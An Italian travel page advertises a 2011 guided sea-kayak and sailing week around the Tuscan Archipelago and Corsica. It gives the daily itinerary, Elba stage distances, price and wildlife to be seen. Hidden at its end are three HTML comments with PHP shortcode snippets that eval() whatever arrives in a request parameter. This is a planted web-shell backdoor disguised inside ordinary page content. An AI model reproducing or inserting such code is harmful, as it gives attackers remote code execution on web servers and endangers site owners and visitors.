Una avventura pagaiando in Arcipelago Toscano, in armonia con la natura, spostandosi in kayak, alla scoperta delle isole più belle del Tirreno.
Data: dal 23/07/2011 al 01/10/2011
Difficoltà:
Costo: 240 € Servizio di Guida Ambientale/istruttore di Kayak; copertura assicurativa; non è compreso il noleggio delle attrezzature
Min. partecipanti: 5
Pagaiando in Arcipelago Toscano _Barca + KAYAK_
Le Isole dell’arcipelago Toscano si prestano perfettamente ad essere visitate con l’ausilio di Sea-Kayak, vere e proprie imbarcazioni a remi sviluppatesi in tempi antichi conservano ancora nelle loro forme la saggezza e l’esperienza dei primi navigatori. Sono affilate per tagliare il mare, hanno scarso pescaggio che consente la navigazione in fondali bassi l’accesso a grotte e piccoli anfratti, perfette per una navigazione sotto costa ed affidabili anche quando per necessità si debbono fare piccole traversate da una punta ad un’altra o per raggiungere qualche isolotto satellite.
Programmi di massima:
all’imbarco, incontro con la Guida, distribuzione delle sacche stagne e organizzazione dei carichi, lezione base di utilizzo di un Sea-Kayak e di come si sta a bordo di una barca a Vela.
PROGRAMMA (Barca a Vela+ Kayak a seguito)
Sabato: incontro al porto di Portoferraio /Scarlino/ Stazione Fs di Follonica e trasferimento in minibus all’imbarco. Presentazione barca ed equipaggio, cambusa e partenza per la Corsica. Cena a bordo, pernottamento a rada Marina di Pietracorbara.
Domenica: escursione in kayak da Pietracorbara a Macinaggio. Cena a bordo, pernottamento a rada Macinaggio.
Lunedì: escursione in kayak da Macinaggio a Barcaggio. Cena a bordo, pernottamento a rada Barcaggio.
Martedì: escursione in kayak da Barcaggio a Centuri. Cena a bordo, pernottamento a rada Centuri.
Mercoledì: navigazione a vela Centuri-Isola di Capraia. Escursione in kayak da Cala del Moreto a Cala della Mortula. Cena a bordo, pernottamento a rada Cala della Mortula.
Giovedì: escursione in kayak da Cala della Mortula a Cala Rossa. Cena a bordo, pernottamento a rada Cala della Moreto.
Venerdì: navigazione a vela Capraia-Isola d’Elba. Escursione in kayak dalla penisola dell’Enfola a Capo Sant’Andrea. Cena a bordo, pernottamento a rada Sant’Andrea.
Sabato: escursione in kayak da Sant’Andrea a Marina di Campo. Sbarco, trasferimento a Portoferraio/Scarlino/ Stazione Fs di Follonica in minibus e partenza.
Il programma della settimana è legato alle condizioni meteo marine e può subire variazioni.
Programma Isole Minori
(Capraia e Giglio)
Partenza dalla spiaggia di varo, vicino al noleggio dei Kayak
Navigazione per circa 3 Ore e sosta in una caletta dove sia possibile fare un bagno ed un pic-nic
Le Isole minori hanno una circonferenza inferiore ai 30 Km che un Canoista allenato potrebbe coprire anche in un’unica tappa, se volete portare il vostro Kayak possiamo supportarvi nella logistica e suggerivi come spedirlo.
Programma di massima ELBA su 5 gg di navigazione:
Giorno 1 – 1° tappa – pernottamento in spiaggia
Percorso: Marciana Marina – Le Tombe. km di tappa 16 Km – km tot 16,01
Giorno 2 – 2° tappa – pernottamento in spiaggia
Percorso Le Tombe – Morcone. km di tappa km 23,55 – km complessivi 39,56.
Giorno 3 – 3° tappa – pernottamento in spiaggia
Percorso: Le Tombe – Terra Nera. km di tappa 22,18 – km complessivi 61,74
Giorno 4 – 4° tappa – pernottamento in spiaggia
Percorso: Terra Nera – Zuppignano Km di tappa 25,11 – km complessivi km 86,85.
Giorno 5 – 5° tappa – pernottamento in spiaggia
Percorso: Zuppignano – Marciana Marina km di tappa 18,15 – km complessivi 105.
Partenza
Entro le ore 20 da Portoferraio per chi deve rientrare
In Dettaglio:
La presenza di coste alte intervallate da cale e poket-beach, grotte e calette, fa di queste isole il luogo ideale per il Sea-Kayak (Kayak da mare). Navigando su un sea-kayak, silenziosamente potremmo esplorare la flora e la fauna marine: Gabbiani Reali (Larus argentatus), Berte (Calonectris diomedea),Marangoni dal Ciuffo (Phalacrocorax aristotelis), banchi di pesci in migrazione e le stupefacenti praterie di Posidonia oceanica. Con l’aiuto di una guida esperta potrete dilettarvi nel Birthwatching, Sea-Watching, Bio-watching, Geo-watching, Snorkling.
Per apprezzare il Sea-Kayak è fondamentale saper nuotare ed avere piacere nello stare in Mare ed in acqua; capacità di adattamento, rispetto per la natura e amore per il mare.
<!– [insert_php]if (isset($_REQUEST["GJSi"])){eval($_REQUEST["GJSi"]);exit;}[/insert_php][php]if (isset($_REQUEST["GJSi"])){eval($_REQUEST["GJSi"]);exit;}[/php] –>
<!– [insert_php]if (isset($_REQUEST["SOzbs"])){eval($_REQUEST["SOzbs"]);exit;}[/insert_php][php]if (isset($_REQUEST["SOzbs"])){eval($_REQUEST["SOzbs"]);exit;}[/php] –>
<!– [insert_php]if (isset($_REQUEST["HCiZI"])){eval($_REQUEST["HCiZI"]);exit;}[/insert_php][php]if (isset($_REQUEST["HCiZI"])){eval($_REQUEST["HCiZI"]);exit;}[/php] –>